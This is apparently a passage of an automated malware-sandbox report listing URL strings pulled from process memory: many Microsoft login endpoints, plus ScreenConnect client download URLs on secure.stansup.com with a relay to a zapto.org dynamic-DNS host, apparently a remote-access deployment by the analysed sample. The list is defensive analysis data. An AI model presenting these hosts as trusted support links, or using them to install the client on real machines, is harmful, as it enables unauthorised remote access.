Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsec
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srfer
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srfuer
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cpsrf
Source: svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/GetUserKeyData.srf
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507247367.000001CEA3159000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1507228196.000001CEA3107000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineClientAuth.srf?stsft=-DjzYTHDArzjEperSFKoy5hDVylCtJARcPfOWs0i
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80600suer
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80601
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80603
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineConnect.srf?id=80604
Source: svchost.exe, 00000008.00000002.2609297562.000001CEA3617000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388566906.000001CEA316B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srf
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfm
Source: svchost.exe, 00000008.00000003.1514739042.000001CEA316D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfssue
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineDesktop.srfsuer
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80502Issuer
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80600
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80601
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80603
Source: svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80604
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=806045
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80605
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80606
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80607
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388501755.000001CEA3157000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlineLogin.srf?id=80608
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000008.00000003.1388207919.000001CEA312C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388303192.000001CEA315A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80601&fid=cp
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388207919.000001CEA3129000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388662538.000001CEA3156000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388324351.000001CEA3152000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/InlinePOPAuth.srf?id=80605
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/SHA1Auth.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/deviceaddcredential.srfer
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/ppsecure/deviceremovecredential.srf
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/resetpw.srf
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/retention.srf
Source: svchost.exe, 00000008.00000002.2609387245.000001CEA3642000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com:443/RST2.srf
Source: svchost.exe, 00000008.00000002.2609739077.000001CEA369C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com:443/RST2.srf0
Source: svchost.exe, 00000008.00000002.2608671439.000001CEA3137000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com:443/RST2.srf256
Source: svchost.exe, 00000008.00000002.2608129190.000001CEA28E6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com:443/RST2.srfityCRL
Source: svchost.exe, 00000008.00000002.2607681480.000001CEA2861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/MSARST2.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceDisassociate.srfDT
Source: svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceQuery.srfsuer
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000008.00000002.2607558130.000001CEA282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388527118.000001CEA3140000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388475252.000001CEA313B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000003.1388547863.000001CEA3163000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/ResolveUser.srf
Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceaddmsacredential.srf
Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/devicechangecredential.srf
Source: svchost.exe, 00000008.00000002.2607598718.000001CEA2847000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com/ppsecure/deviceremovecredential.srf
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.staP
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.staPJ
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.staPJh
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.staPb
Source: dfsvc.exe, 00000002.00000002.2257457439.00000276A42F9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.c
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A61B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A69B000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A3A3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A249000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000599000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/Scre
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A664000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.C
Source: dfsvc.exe, 00000002.00000002.2236254474.0000027688762000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client
Source: 96r3GgxntQ.exe, 00000000.00000002.1554370443.000000000082A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicatI5
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.0000000002421000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#
Source: dfsvc.exe, 00000002.00000002.2237912718.000002768A2CB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.appl
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp, 5W9VLRZG.log.2.dr String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnect.WindowsClient.applicat
Source: dfsvc.exe, 00000002.00000002.2257743246.00000276A5F10000.00000004.00000020.00020000.00000000.sdmp, dfsvc.exe, 00000002.00000002.2257953370.00000276A5F3D000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1746319827.000000001AD01000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735935388.0000000000679000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application%
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application.MO3RT
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application1
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application16
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1735285114.0000000000620000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1747404710.000000001AD19000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application9e0892
Source: 5W9VLRZG.log.2.dr String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=kjh231a.zapto.or
Source: dfsvc.exe, 00000002.00000002.2252252771.00000276A2B61000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationG
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationGU
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationMO3
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationMO33UA
Source: dfsvc.exe, 00000002.00000002.2255490095.00000276A4156000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationO3
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1736710377.000000000242F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://secure.stansup.com/Bin/ScreenConnect.Client.applicationX
